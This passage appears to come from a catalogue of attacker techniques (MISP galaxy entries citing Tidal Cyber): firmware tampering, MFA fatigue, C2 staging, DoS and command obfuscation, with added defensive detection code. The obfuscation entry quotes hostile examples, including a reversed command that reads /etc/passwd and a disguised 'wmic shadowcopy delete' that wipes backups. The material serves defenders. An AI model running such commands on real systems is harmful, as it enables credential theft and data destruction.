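BASELINE = {
    "edge-rtr-1": {"version": "15.2(4)M7", "sha256": sha256_hex(GOOD_IMAGE)},
}


def check_device(name, reported_version, image_bytes, baseline=BASELINE):
    """Return a list of findings for one device: 'downgrade' when the reported
    version is older than baseline, 'image_hash_mismatch' when the stored image
    differs from the known-good file. A patched version command that still
    reports the baseline version is caught by the hash, not the version."""
    expected = baseline[name]
    findings = []
    if version_key(reported_version) < version_key(expected["version"]):
        findings.append("downgrade")
    if sha256_hex(image_bytes) != expected["sha256"]:
        findings.append("image_hash_mismatch")
    return findings


if __name__ == "__main__":
    print("clean:", check_device("edge-rtr-1", "15.2(4)M7", GOOD_IMAGE))
    print("downgraded:", check_device("edge-rtr-1", "15.1(4)M12a", OLD_IMAGE))
    print("patched, version lies:", check_device("edge-rtr-1", "15.2(4)M7", PATCHED_IMAGE))
```

The hash must be computed over the file as read from the device's storage (or, better, from an out-of-band copy), since a live-patched image in memory leaves the stored file untouched; the entry on in-memory patching above is exactly the case this check does not see without a memory-level integrity feature.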

Modify System Image

Adversaries may make changes to the operating system of embedded network devices to weaken defenses and provide new capabilities for themselves. On such devices, the operating systems are typically monolithic and most of the device functionality and capabilities are contained within a single file.

To change the operating system, the adversary typically only needs to affect this one file, replacing or modifying it. This can either be done live in memory during system runtime for immediate effect, or in storage to implement the change on the next boot of the network device.

The tag is: misp-galaxy:technique="Modify System Image"

Multi-Factor Authentication Interception

Adversaries may target multi-factor authentication (MFA) mechanisms (i.e., smart cards, token generators, etc.) to gain access to credentials that can be used to access systems, services, and network resources. Use of MFA is recommended and provides a higher level of security than usernames and passwords alone, but organizations should be aware of techniques that could be used to intercept and bypass these security mechanisms.

If a smart card is used for multi-factor authentication, then a keylogger will need to be used to obtain the password associated with a smart card during normal use. With both an inserted card and access to the smart card password, an adversary can connect to a network resource using the infected system to proxy the authentication with the inserted hardware token. <sup>[[Mandiant M Trends 2011](https://app.tidalcyber.com/references/563be052-29ac-4625-927d-84e475ef848e)]</sup>

Adversaries may also employ a keylogger to similarly target other hardware tokens, such as RSA SecurID. Capturing token input (including a user’s personal identification code) may provide temporary access (i.e. replay the one-time passcode until the next value rollover) as well as possibly enabling adversaries to reliably predict future authentication values (given access to both the algorithm and any seed values used to generate appended temporary codes). <sup>[[GCN RSA June 2011](https://app.tidalcyber.com/references/40564d23-b9ae-4bb3-8dd1-d6b01163a32d)]</sup>

Other methods of MFA may be intercepted and used by an adversary to authenticate. It is common for one-time codes to be sent via out-of-band communications (email, SMS). If the device and/or service is not secured, then it may be vulnerable to interception. Service providers can also be targeted: for example, an adversary may compromise an SMS messaging service in order to steal MFA codes sent to users’ phones.<sup>[[Okta Scatter Swine 2022](https://app.tidalcyber.com/references/66d1b6e2-c069-5832-b549-fc5f0edeed40)]</sup>

The tag is: misp-galaxy:technique="Multi-Factor Authentication Interception"

Multi-Factor Authentication Request Generation

Adversaries may attempt to bypass multi-factor authentication (MFA) mechanisms and gain access to accounts by generating MFA requests sent to users.

Adversaries in possession of credentials to [Valid Accounts](https://app.tidalcyber.com/technique/a9b7eb2f-63e7-41bc-9d77-f7c4cede5406) may be unable to complete the login process if they lack access to the 2FA or MFA mechanisms required as an additional credential and security control. To circumvent this, adversaries may abuse the automatic generation of push notifications to MFA services such as Duo Push, Microsoft Authenticator, Okta, or similar services to have the user grant access to their account.

In some cases, adversaries may continuously repeat login attempts in order to bombard users with MFA push notifications, SMS messages, and phone calls, potentially resulting in the user finally accepting the authentication request in response to “MFA fatigue.”<sup>[[Russian 2FA Push Annoyance - Cimpanu](https://app.tidalcyber.com/references/ad2b0648-b657-4daa-9510-82375a252fc4)]</sup><sup>[[MFA Fatigue Attacks - PortSwigger](https://app.tidalcyber.com/references/1b7b0f00-71ba-4762-ae81-bce24591cff4)]</sup><sup>[[Suspected Russian Activity Targeting Government and Business Entities Around the Globe](https://app.tidalcyber.com/references/f45a0551-8d49-4d40-989f-659416dc25ec)]</sup>

The tag is: misp-galaxy:technique="Multi-Factor Authentication Request Generation"
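The "MFA fatigue" pattern described above has a clear telemetry signature: a burst of push prompts to one user in a short window, most of them denied or timed out, often ending in a single approval. The detection below runs that logic over identity-provider style log lines. It is an added example, not MISP or Tidal Cyber code; the log format (`time user=... push=...`) and the entries are constructed for this example, so a real deployment would replace `parse_log` with the parser for its IdP's export.

```python
"""Detect MFA push fatigue: many prompts to one user inside a sliding window,
with a flag when a run of rejections ends in an approval.
Added example (not MISP/Tidal Cyber code); log lines below are constructed."""
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample log (not real IdP output): timestamp, user, push result.
SAMPLE_LOG = """\
2024-05-01T08:00:05Z user=alice push=approved
2024-05-01T08:00:10Z user=bob push=denied
2024-05-01T08:00:40Z user=bob push=timeout
2024-05-01T08:01:10Z user=bob push=denied
2024-05-01T08:01:50Z user=bob push=timeout
2024-05-01T08:02:30Z user=bob push=denied
2024-05-01T08:03:05Z user=bob push=approved
2024-05-01T09:15:00Z user=carol push=denied
2024-05-01T09:15:30Z user=carol push=approved
"""

WINDOW = timedelta(minutes=5)
THRESHOLD = 4          # prompts inside WINDOW before we alert
REJECTED = {"denied", "timeout"}


def parse_log(text):
    """Return [(datetime, user, result)] from the constructed line format."""
    events = []
    for line in text.splitlines():
        ts, user, result = line.split()
        events.append((datetime.strptime(ts, "%Y-%m-%dT%H:%M:%SZ"),
                       user.split("=", 1)[1], result.split("=", 1)[1]))
    return events


def detect_fatigue(events, window=WINDOW, threshold=THRESHOLD):
    """Return {user: {"prompts": n, "rejections": n, "approved_after_rejections": bool}}
    for each user with >= threshold prompts inside some window-long span."""
    per_user = defaultdict(list)
    for t, user, result in sorted(events):
        per_user[user].append((t, result))

    findings = {}
    for user, evs in per_user.items():
        for i, (t0, _) in enumerate(evs):
            # events are time-sorted, so the span starting at i is contiguous
            span = [r for t, r in evs[i:] if t - t0 <= window]
            if len(span) >= threshold:
                rejections = sum(1 for r in span if r in REJECTED)
                findings[user] = {
                    "prompts": len(span),
                    "rejections": rejections,
                    # an approval after repeated rejections is the fatigue outcome
                    "approved_after_rejections": rejections > 0 and span[-1] == "approved",
                }
                break
    return findings


if __name__ == "__main__":
    for user, f in detect_fatigue(parse_log(SAMPLE_LOG)).items():
        print(user, f)
```

Tune `THRESHOLD` and `WINDOW` to the help-desk reality of your tenant (a single retry after a timeout is normal), and treat `approved_after_rejections` as the high-severity case that warrants a session revocation and a call to the user.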

Multi-Stage Channels

Adversaries may create multiple stages for command and control that are employed under different conditions or for certain functions. Use of multiple stages may obfuscate the command and control channel to make detection more difficult.

Remote access tools will call back to the first-stage command and control server for instructions. The first stage may have automated capabilities to collect basic host information, update tools, and upload additional files. A second remote access tool (RAT) could be uploaded at that point to redirect the host to the second-stage command and control server. The second stage will likely be more fully featured and allow the adversary to interact with the system through a reverse shell and additional RAT features.

The different stages will likely be hosted separately with no overlapping infrastructure. The loader may also have backup first-stage callbacks or [Fallback Channels](https://app.tidalcyber.com/technique/be8786b3-cd3d-47ef-a9e7-cd3ab3c901a1) in case the original first-stage communication path is discovered and blocked.

The tag is: misp-galaxy:technique="Multi-Stage Channels"

Native API

Adversaries may interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.<sup>[[NT API Windows](https://app.tidalcyber.com/references/306f7da7-caa2-40bf-a3db-e579c541eeb4)]</sup><sup>[[Linux Kernel API](https://app.tidalcyber.com/references/0a30d54e-187a-43e0-9725-3c80aa1c7619)]</sup> These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.

Adversaries may abuse these OS API functions as a means of executing behaviors. Similar to [Command and Scripting Interpreter](https://app.tidalcyber.com/technique/a2184d53-63b1-4c40-81ed-da799080c36c), the native API and its hierarchy of interfaces provide mechanisms to interact with and utilize various components of a victimized system.

Native API functions (such as <code>NtCreateProcess</code>) may be directly invoked via system calls / syscalls, but these features are also often exposed to user-mode applications via interfaces and libraries.<sup>[[OutFlank System Calls](https://app.tidalcyber.com/references/c4c3370a-2d6b-4ebd-961e-58d584066377)]</sup><sup>[[CyberBit System Calls](https://app.tidalcyber.com/references/c13cf528-2a7d-4a32-aee2-db5db2f30298)]</sup><sup>[[MDSec System Calls](https://app.tidalcyber.com/references/b461e226-1317-4ce4-a195-ba4c4957db99)]</sup> For example, functions such as the Windows API <code>CreateProcess()</code> or GNU <code>fork()</code> will allow programs and scripts to start other processes.<sup>[[Microsoft CreateProcess](https://app.tidalcyber.com/references/aa336e3a-464d-48ce-bebb-760b73764610)]</sup><sup>[[GNU Fork](https://app.tidalcyber.com/references/c46331cb-328a-46e3-89c4-e43fa345d6e8)]</sup> This may allow API callers to execute a binary, run a CLI command, load modules, etc., as thousands of similar API functions exist for various system operations.<sup>[[Microsoft Win32](https://app.tidalcyber.com/references/585b9975-3cfb-4485-a9eb-5eea337ebd3c)]</sup><sup>[[LIBC](https://app.tidalcyber.com/references/a3fe6ea5-c443-473a-bb13-b4fd8f4923fd)]</sup><sup>[[GLIBC](https://app.tidalcyber.com/references/75a6a1bf-a5a7-419d-b290-6662aeddb7eb)]</sup>

Higher level software frameworks, such as Microsoft .NET and macOS Cocoa, are also available to interact with native APIs. These frameworks typically provide language wrappers/abstractions to API functionalities and are designed for ease-of-use/portability of code.<sup>[[Microsoft NET](https://app.tidalcyber.com/references/b4727044-51bb-43b3-afdb-515bb4bb0f7e)]</sup><sup>[[Apple Core Services](https://app.tidalcyber.com/references/0ef05e47-1305-4715-a677-67f1b55b24a3)]</sup><sup>[[MACOS Cocoa](https://app.tidalcyber.com/references/6ada4c6a-23dc-4469-a3a1-1d3b4935db97)]</sup><sup>[[macOS Foundation](https://app.tidalcyber.com/references/ea194268-0a8f-4494-be09-ef5f679f68fe)]</sup>

Adversaries may use assembly to directly or indirectly invoke syscalls in an attempt to subvert defensive sensors and detection signatures such as user mode API hooks.<sup>[[Redops Syscalls](https://app.tidalcyber.com/references/dd8c2edd-b5ba-5a41-b65d-c3a2951d07b8)]</sup> Adversaries may also attempt to tamper with sensors and defensive tools associated with API monitoring, such as unhooking monitored functions via [Disable or Modify Tools](https://app.tidalcyber.com/technique/9f290216-b2ab-47b5-b9ae-a94ae6d357c6).

The tag is: misp-galaxy:technique="Native API"

Network Address Translation Traversal

Adversaries may bridge network boundaries by modifying a network device’s Network Address Translation (NAT) configuration. Malicious modifications to NAT may enable an adversary to bypass restrictions on traffic routing that otherwise separate trusted and untrusted networks.

Network devices such as routers and firewalls that connect multiple networks together may implement NAT during the process of passing packets between networks. When performing NAT, the network device will rewrite the source and/or destination addresses of the IP address header. Some network designs require NAT for the packets to cross the border device. A typical example of this is environments where internal networks make use of non-Internet routable addresses.<sup>[[RFC1918](https://app.tidalcyber.com/references/f2cdf62e-cb9b-4a48-99a2-d46e7d9e7a9e)]</sup>

When an adversary gains control of a network boundary device, they can either leverage existing NAT configurations to send traffic between two separated networks, or they can implement NAT configurations of their own design. In the case of network designs that require NAT to function, this enables the adversary to overcome inherent routing limitations that would normally prevent them from accessing protected systems behind the border device. In the case of network designs that do not require NAT, address translation can be used by adversaries to obscure their activities, as changing the addresses of packets that traverse a network boundary device can make monitoring data transmissions more challenging for defenders.

Adversaries may use [Patch System Image](https://app.tidalcyber.com/technique/630a17c1-0176-4764-8f5c-a83f4f3e980f) to change the operating system of a network device, implementing their own custom NAT mechanisms to further obscure their activities.

The tag is: misp-galaxy:technique="Network Address Translation Traversal"

Network Boundary Bridging

Adversaries may bridge network boundaries by compromising perimeter network devices or internal devices responsible for network segmentation. Breaching these devices may enable an adversary to bypass restrictions on traffic routing that otherwise separate trusted and untrusted networks.

Devices such as routers and firewalls can be used to create boundaries between trusted and untrusted networks. They achieve this by restricting traffic types to enforce organizational policy in an attempt to reduce the risk inherent in such connections. Restriction of traffic can be achieved by prohibiting IP addresses, layer 4 protocol ports, or through deep packet inspection to identify applications. To participate with the rest of the network, these devices can be directly addressable or transparent, but their mode of operation has no bearing on how the adversary can bypass them when compromised.

When an adversary takes control of such a boundary device, they can bypass its policy enforcement to pass normally prohibited traffic across the trust boundary between the two separated networks without hindrance. By achieving sufficient rights on the device, an adversary can reconfigure the device to allow the traffic they want, allowing them to then further achieve goals such as command and control via [Multi-hop Proxy](https://app.tidalcyber.com/technique/fa05c148-56a0-43ae-b8e4-2d4e91641400) or exfiltration of data via [Traffic Duplication](https://app.tidalcyber.com/technique/c2fc2776-e674-46ff-8b8d-ecc90b8b1c26). Adversaries may also target internal devices responsible for network segmentation and abuse these in conjunction with [Internal Proxy](https://app.tidalcyber.com/technique/8b744bfc-6bfb-45c5-8bb8-5b736ce7e634) to achieve the same goals.<sup>[[Kaspersky ThreatNeedle Feb 2021](https://app.tidalcyber.com/references/ba6a5fcc-9391-42c0-8b90-57b729525f41)]</sup> In the cases where a border device separates two separate organizations, the adversary can also facilitate lateral movement into new victim environments.

The tag is: misp-galaxy:technique="Network Boundary Bridging"

Direct Network Flood

Adversaries may attempt to cause a denial of service (DoS) by directly sending a high-volume of network traffic to a target. This DoS attack may also reduce the availability and functionality of the targeted system(s) and network. [Direct Network Flood](https://app.tidalcyber.com/technique/66657af9-83f7-4a54-b41b-301bfcdae866)s are when one or more systems are used to send a high-volume of network packets towards the targeted service’s network. Almost any network protocol may be used for flooding. Stateless protocols such as UDP or ICMP are commonly used but stateful protocols such as TCP can be used as well.

Botnets are commonly used to conduct network flooding attacks against networks and services. Large botnets can generate a significant amount of traffic from systems spread across the global Internet. Adversaries may have the resources to build out and control their own botnet infrastructure or may rent time on an existing botnet to conduct an attack. In some of the worst cases for distributed DoS (DDoS), so many systems are used to generate the flood that each one only needs to send out a small amount of traffic to produce enough volume to saturate the target network. In such circumstances, distinguishing DDoS traffic from legitimate clients becomes exceedingly difficult. Botnets have been used in some of the most high-profile DDoS flooding attacks, such as the 2012 series of incidents that targeted major US banks.<sup>[[USNYAG IranianBotnet March 2016](https://app.tidalcyber.com/references/69ee73c1-359f-4584-a6e7-75119d24bbf5)]</sup>

The tag is: misp-galaxy:technique="Direct Network Flood"

Reflection Amplification

Adversaries may attempt to cause a denial of service (DoS) by reflecting a high-volume of network traffic to a target. This type of Network DoS takes advantage of a third-party server intermediary that hosts and will respond to a given spoofed source IP address. This third-party server is commonly termed a reflector. An adversary accomplishes a reflection attack by sending packets to reflectors with the spoofed address of the victim. Similar to Direct Network Floods, more than one system may be used to conduct the attack, or a botnet may be used. Likewise, one or more reflectors may be used to focus traffic on the target.<sup>[[Cloudflare ReflectionDoS May 2017](https://app.tidalcyber.com/references/a6914c13-f95f-4c30-a129-905ed43e3454)]</sup> This Network DoS attack may also reduce the availability and functionality of the targeted system(s) and network.

Reflection attacks often take advantage of protocols with larger responses than requests in order to amplify their traffic, commonly known as a Reflection Amplification attack. Adversaries may be able to generate an increase in volume of attack traffic that is several orders of magnitude greater than the requests sent to the amplifiers. The extent of this increase will depend upon many variables, such as the protocol in question, the technique used, and the amplifying servers that actually produce the amplification in attack volume. Two prominent protocols that have enabled Reflection Amplification Floods are DNS<sup>[[Cloudflare DNSamplficationDoS](https://app.tidalcyber.com/references/734cb2bb-462a-4bdc-9774-6883f99379b9)]</sup> and NTP<sup>[[Cloudflare NTPamplifciationDoS](https://app.tidalcyber.com/references/09ce093a-d378-4915-a35f-bf18a278d873)]</sup>, though the use of several others in the wild has been documented.<sup>[[Arbor AnnualDoSreport Jan 2018](https://app.tidalcyber.com/references/cede4c72-718b-48c2-8a59-1f91555f6cf6)]</sup> In particular, the memcache protocol showed itself to be a powerful protocol, with amplification sizes up to 51,200 times the requesting packet.<sup>[[Cloudflare Memcrashed Feb 2018](https://app.tidalcyber.com/references/a2a0c1eb-20ad-4c40-a8cd-1732fdde7e19)]</sup>

The tag is: misp-galaxy:technique="Reflection Amplification"

Network Denial of Service

Adversaries may perform Network Denial of Service (DoS) attacks to degrade or block the availability of targeted resources to users. Network DoS can be performed by exhausting the network bandwidth services rely on. Example resources include specific websites, email services, DNS, and web-based applications. Adversaries have been observed conducting network DoS attacks for political purposes<sup>[[FireEye OpPoisonedHandover February 2016](https://app.tidalcyber.com/references/1d57b1c8-930b-4bcb-a51e-39020327cc5d)]</sup> and to support other malicious activities, including distraction<sup>[[FSISAC FraudNetDoS September 2012](https://app.tidalcyber.com/references/9c8772eb-6d1d-4742-a2db-a5e1006effaa)]</sup>, hacktivism, and extortion.<sup>[[Symantec DDoS October 2014](https://app.tidalcyber.com/references/878e0382-4191-4bca-8adc-c379b0d57ba8)]</sup>

A Network DoS will occur when the bandwidth capacity of the network connection to a system is exhausted due to the volume of malicious traffic directed at the resource or the network connections and network devices the resource relies on. For example, an adversary may send 10Gbps of traffic to a server that is hosted by a network with a 1Gbps connection to the internet. This traffic can be generated by a single system or multiple systems spread across the internet, which is commonly referred to as a distributed DoS (DDoS).

Several aspects of Network DoS attacks apply across multiple methods, including IP address spoofing and botnets.

Adversaries may use the original IP address of an attacking system, or spoof the source IP address to make the attack traffic more difficult to trace back to the attacking system or to enable reflection. Spoofing makes the attack harder to defend against by reducing or eliminating the effectiveness of source-address filtering on network defense devices.

For DoS attacks targeting the hosting system directly, see [Endpoint Denial of Service](https://app.tidalcyber.com/technique/8b0caea0-602e-4117-8322-b125150f5c2a).

The tag is: misp-galaxy:technique="Network Denial of Service"

Network Service Discovery

Adversaries may attempt to get a listing of services running on remote hosts and local network infrastructure devices, including those that may be vulnerable to remote software exploitation. Common methods to acquire this information include port and/or vulnerability scans using tools that are brought onto a system.<sup>[[CISA AR21-126A FIVEHANDS May 2021](https://app.tidalcyber.com/references/f98604dd-2881-4024-8e43-6f5f48c6c9fa)]</sup>

Within cloud environments, adversaries may attempt to discover services running on other cloud hosts. Additionally, if the cloud environment is connected to an on-premises environment, adversaries may be able to identify services running on non-cloud systems as well.

Within macOS environments, adversaries may use the native Bonjour application to discover services running on other macOS hosts within a network. The Bonjour mDNSResponder daemon automatically registers and advertises a host’s registered services on the network. For example, adversaries can use an mDNS query (such as <code>dns-sd -B _ssh._tcp .</code>) to find other systems broadcasting the SSH service.<sup>[[apple doco bonjour description](https://app.tidalcyber.com/references/b8538d67-ab91-41c2-9cc3-a7b00c6b372a)]</sup><sup>[[macOS APT Activity Bradley](https://app.tidalcyber.com/references/7ccda957-b38d-4c3f-a8f5-6cecdcb3f584)]</sup>

The tag is: misp-galaxy:technique="Network Service Discovery"

Network Share Discovery

Adversaries may look for folders and drives shared on remote systems as a means of identifying sources of information to gather as a precursor for Collection and to identify potential systems of interest for Lateral Movement. Networks often contain shared network drives and folders that enable users to access file directories on various systems across a network.

File sharing over a Windows network occurs over the SMB protocol.<sup>[[Wikipedia Shared Resource](https://app.tidalcyber.com/references/6cc6164e-84b3-4413-9895-6719248808fb)]</sup><sup>[[TechNet Shared Folder](https://app.tidalcyber.com/references/80a9b92a-1404-4454-88f0-dd929a12e16f)]</sup> [Net](https://app.tidalcyber.com/software/c9b8522f-126d-40ff-b44e-1f46098bd8cc) can be used to query a remote system for available shared drives using the <code>net view \\remotesystem</code> command. It can also be used to query shared drives on the local system using <code>net share</code>. For macOS, the <code>sharing -l</code> command lists all shared points used for SMB services.

The tag is: misp-galaxy:technique="Network Share Discovery"

Network Sniffing

Adversaries may sniff network traffic to capture information about an environment, including authentication material passed over the network. Network sniffing refers to using the network interface on a system to monitor or capture information sent over a wired or wireless connection. An adversary may place a network interface into promiscuous mode to passively access data in transit over the network, or use span ports to capture a larger amount of data.

Data captured via this technique may include user credentials, especially those sent over an insecure, unencrypted protocol. Techniques for name service resolution poisoning, such as [LLMNR/NBT-NS Poisoning and SMB Relay](https://app.tidalcyber.com/technique/b44a263f-76b2-4a1f-baeb-dd285974eca6), can also be used to capture credentials to websites, proxies, and internal systems by redirecting traffic to an adversary.

Network sniffing may also reveal configuration details, such as running services, version numbers, and other network characteristics (e.g. IP addresses, hostnames, VLAN IDs) necessary for subsequent Lateral Movement and/or Defense Evasion activities.

In cloud-based environments, adversaries may still be able to use traffic mirroring services to sniff network traffic from virtual machines. For example, AWS Traffic Mirroring, GCP Packet Mirroring, and Azure vTap allow users to define specified instances to collect traffic from and specified targets to send collected traffic to.<sup>[[AWS Traffic Mirroring](https://app.tidalcyber.com/references/6b77a2f3-39b8-4574-8dee-cde7ba9debff)]</sup><sup>[[GCP Packet Mirroring](https://app.tidalcyber.com/references/c91c6399-3520-4410-936d-48c3b13235ca)]</sup><sup>[[Azure Virtual Network TAP](https://app.tidalcyber.com/references/3f106d7e-f101-4adb-bbd1-d8c04a347f85)]</sup> Often, much of this traffic will be in cleartext due to the use of TLS termination at the load balancer level to reduce the strain of encrypting and decrypting traffic.<sup>[[Rhino Security Labs AWS VPC Traffic Mirroring](https://app.tidalcyber.com/references/09cac813-862c-47c8-a47f-154c5436afbb)]</sup><sup>[[SpecterOps AWS Traffic Mirroring](https://app.tidalcyber.com/references/6ab2cfa1-230f-498e-8049-fcdd2f7296dd)]</sup> The adversary can then use exfiltration techniques such as Transfer Data to Cloud Account in order to access the sniffed traffic.<sup>[[Rhino Security Labs AWS VPC Traffic Mirroring](https://app.tidalcyber.com/references/09cac813-862c-47c8-a47f-154c5436afbb)]</sup>

On network devices, adversaries may perform network captures using [Network Device CLI](https://app.tidalcyber.com/technique/284bfbb3-99f0-4c3d-bc1f-ab74065b7907) commands such as <code>monitor capture</code>.<sup>[[US-CERT-TA18-106A](https://app.tidalcyber.com/references/1fe55557-94af-4697-a675-884701f70f2a)]</sup><sup>[[capture_embedded_packet_on_software](https://app.tidalcyber.com/references/5d973180-a28a-5c8f-b13a-45d21331700f)]</sup>

The tag is: misp-galaxy:technique="Network Sniffing"

Non-Application Layer Protocol

Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.<sup>[[Wikipedia OSI](https://app.tidalcyber.com/references/d1080030-12c7-4223-92ab-fb764acf111d)]</sup> Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).

ICMP communication between hosts is one example.<sup>[[Cisco Synful Knock Evolution](https://app.tidalcyber.com/references/29301297-8343-4f75-8096-7fe229812f75)]</sup> Because ICMP is part of the Internet Protocol Suite, it is required to be implemented by all IP-compatible hosts.<sup>[[Microsoft ICMP](https://app.tidalcyber.com/references/47612548-dad1-4bf3-aa6f-a53aefa06f6a)]</sup> However, it is not as commonly monitored as other Internet Protocols such as TCP or UDP and may be used by adversaries to hide communications.

The tag is: misp-galaxy:technique="Non-Application Layer Protocol"

Non-Standard Port

Adversaries may communicate using a protocol and port pairing that are not typically associated with each other. For example, HTTPS over port 8088<sup>[[Symantec Elfin Mar 2019](https://app.tidalcyber.com/references/55671ede-f309-4924-a1b4-3d597517b27e)]</sup> or port 587<sup>[[Fortinet Agent Tesla April 2018](https://app.tidalcyber.com/references/86a65be7-0f70-4755-b526-a26b92eabaa2)]</sup> as opposed to the traditional port 443. Adversaries may make changes to the standard port used by a protocol to bypass filtering or muddle analysis/parsing of network data.

Adversaries may also make changes to victim systems to abuse non-standard ports. For example, Registry keys and other configuration settings can be used to modify protocol and port pairings.<sup>[[change_rdp_port_conti](https://app.tidalcyber.com/references/c0deb077-6c26-52f1-9e7c-d1fb535a02a0)]</sup>

The tag is: misp-galaxy:technique="Non-Standard Port"

Binary Padding

Adversaries may use binary padding to add junk data and change the on-disk representation of malware. This can be done without affecting the functionality or behavior of a binary, but can increase the size of the binary beyond what some security tools are capable of handling due to file size limitations.

Binary padding effectively changes the checksum of the file and can also be used to avoid hash-based blocklists and static anti-virus signatures.<sup>[[ESET OceanLotus](https://app.tidalcyber.com/references/a7bcbaca-10c1-403a-9eb5-f111af1cbf6a)]</sup> The padding used is commonly generated by a function that creates junk data, which is then appended to the end of the malware or applied to its sections.<sup>[[Securelist Malware Tricks April 2017](https://app.tidalcyber.com/references/3430ac9b-1621-42b4-9cc7-5ee60191051f)]</sup> Increasing the file size may decrease the effectiveness of certain tools and detection capabilities that are not designed or configured to scan large files. This may also reduce the likelihood of the file being collected for analysis. Public file scanning services, such as VirusTotal, limit the maximum size of an uploaded file to be analyzed.<sup>[[VirusTotal FAQ](https://app.tidalcyber.com/references/5cd965f6-c4af-40aa-8f08-620cf5f1242a)]</sup>

The tag is: misp-galaxy:technique="Binary Padding"

Command Obfuscation

Adversaries may obfuscate content during command execution to impede detection. Command-line obfuscation is a method of making strings and patterns within commands and scripts more difficult to signature and analyze. This type of obfuscation can be included within commands executed by delivered payloads (e.g., [Phishing](https://app.tidalcyber.com/technique/d4a36624-50cb-43d3-95af-a2e10878a533) and [Drive-by Compromise](https://app.tidalcyber.com/technique/d4e46fe1-cc6d-4ef0-af72-a4e8dcd71381)) or interactively via [Command and Scripting Interpreter](https://app.tidalcyber.com/technique/a2184d53-63b1-4c40-81ed-da799080c36c).<sup>[[Akamai JS](https://app.tidalcyber.com/references/379a177b-0c31-5840-ad54-3fdfc9904a88)]</sup><sup>[[Malware Monday VBE](https://app.tidalcyber.com/references/9b52a72b-938a-5eb6-a3b7-5a925657f0a3)]</sup>

For example, adversaries may abuse syntax that utilizes various symbols and escape characters (such as spacing, `^`, `+`, `$`, and `%`) to make commands difficult to analyze while maintaining the same intended functionality.<sup>[[RC PowerShell](https://app.tidalcyber.com/references/0f154aa6-8c9d-5bfc-a3c4-5f3e1420f55f)]</sup> Many languages support built-in obfuscation in the form of base64 or URL encoding.<sup>[[Microsoft PowerShellB64](https://app.tidalcyber.com/references/7e50721c-c6d5-5449-8326-529da4cf5465)]</sup> Adversaries may also manually implement command obfuscation via string splitting (`"Wor"+"d.Application"`), order and casing of characters (`rev <<<'dwssap/cte/ tac'`), globbing (`mkdir -p '/tmp/:&$NiA'`), as well as various tricks involving passing strings through tokens/environment variables/input streams.<sup>[[Bashfuscator Command Obfuscators](https://app.tidalcyber.com/references/c0256889-3ff0-59de-b0d1-39a947a4c89d)]</sup><sup>[[FireEye Obfuscation June 2017](https://app.tidalcyber.com/references/6d1089b7-0efe-4961-8abc-22a882895377)]</sup>

Adversaries may also use tricks such as directory traversals to obfuscate references to the binary being invoked by a command (<code>C:\voi\pcw\..\..\Windows\tei\qs\k\..\..\..\system32\erool\..\wbem\wg\je\..\..\wmic.exe shadowcopy delete</code>).<sup>[[Twitter Richard WMIC](https://app.tidalcyber.com/references/7d701a8e-6816-5112-ac16-b36e71d7c5db)]</sup>

Tools such as <code>Invoke-Obfuscation</code> and <code>Invoke-DOSfucation</code> have also been used to obfuscate commands.<sup>[[Invoke-DOSfuscation](https://app.tidalcyber.com/references/d2f7fe4a-1a3a-5b26-8247-4f05c96974bf)]</sup><sup>[[Invoke-Obfuscation](https://app.tidalcyber.com/references/4cc6a80f-d758-524b-9519-5b839d4918bd)]</sup>
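To illustrate what a detection pipeline has to undo before it can match a signature, here is an added example (not part of the MISP galaxy or any of the cited tools) that normalizes two of the cmd.exe tricks mentioned above: `^` escape characters and `%VAR:~start,len%` substring expansion. The `COMSPEC` value and the sample command lines are constructed for the demonstration.

```python
import re

# %VAR% and the %VAR:~start,len% substring form that obfuscators lean on.
ENV_REF = re.compile(r"%([A-Za-z_][A-Za-z0-9_]*)(?::~(-?\d+)(?:,(-?\d+))?)?%")


def expand_env(cmd: str, env: dict) -> str:
    """Expand %VAR% and %VAR:~start,len% with cmd.exe substring semantics
    (negative start counts from the end, negative len trims from the end);
    unknown variables are left untouched, as cmd.exe does."""
    def repl(m):
        value = env.get(m.group(1).upper())
        if value is None:
            return m.group(0)
        if m.group(2) is None:
            return value
        start = int(m.group(2))
        if start < 0:
            start = max(len(value) + start, 0)
        if m.group(3) is None:
            return value[start:]
        length = int(m.group(3))
        end = len(value) + length if length < 0 else start + length
        return value[start:end]
    return ENV_REF.sub(repl, cmd)


def strip_carets(cmd: str) -> str:
    """Remove ^ escapes outside double quotes (inside quotes cmd.exe treats
    ^ literally), keeping the character that was escaped."""
    out, in_quotes, i = [], False, 0
    while i < len(cmd):
        ch = cmd[i]
        if ch == '"':
            in_quotes = not in_quotes
            out.append(ch)
        elif ch == "^" and not in_quotes and i + 1 < len(cmd):
            out.append(cmd[i + 1])  # emit the escaped character as-is
            i += 1
        else:
            out.append(ch)
        i += 1
    return "".join(out)


def normalize_cmd(cmd: str, env: dict) -> str:
    """Percent expansion precedes caret handling, mirroring cmd.exe's parse order."""
    return strip_carets(expand_env(cmd, env))


def obfuscation_indicators(cmd: str) -> dict:
    """Cheap features for a detection rule: escape carets and substring
    expansions are rare in hand-typed commands but common in obfuscated ones."""
    return {
        "carets": cmd.count("^"),
        "substring_expansions": sum(1 for m in ENV_REF.finditer(cmd) if m.group(2)),
    }


# Constructed environment and sample command line (not taken from a real incident).
SAMPLE_ENV = {"COMSPEC": r"C:\Windows\system32\cmd.exe"}
SAMPLE_CMD = "%COMSPEC:~-7,3% /c ec^ho hel^lo"

if __name__ == "__main__":
    print(obfuscation_indicators(SAMPLE_CMD))
    print(normalize_cmd(SAMPLE_CMD, SAMPLE_ENV))  # cmd /c echo hello
```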

The tag is: misp-galaxy:technique="Command Obfuscation"

Compile After Delivery

Adversaries may attempt to make payloads difficult to discover and analyze by delivering files to victims as uncompiled code. Text-based source code files may subvert analysis and scrutiny from protections targeting executables/binaries. These payloads will need to be compiled before execution, typically via native utilities such as csc.exe or GCC/MinGW.<sup>[[ClearSky MuddyWater Nov 2018](https://app.tidalcyber.com/references/a5f60f45-5df5-407d-9f68-bc5f7c42ee85)]</sup>

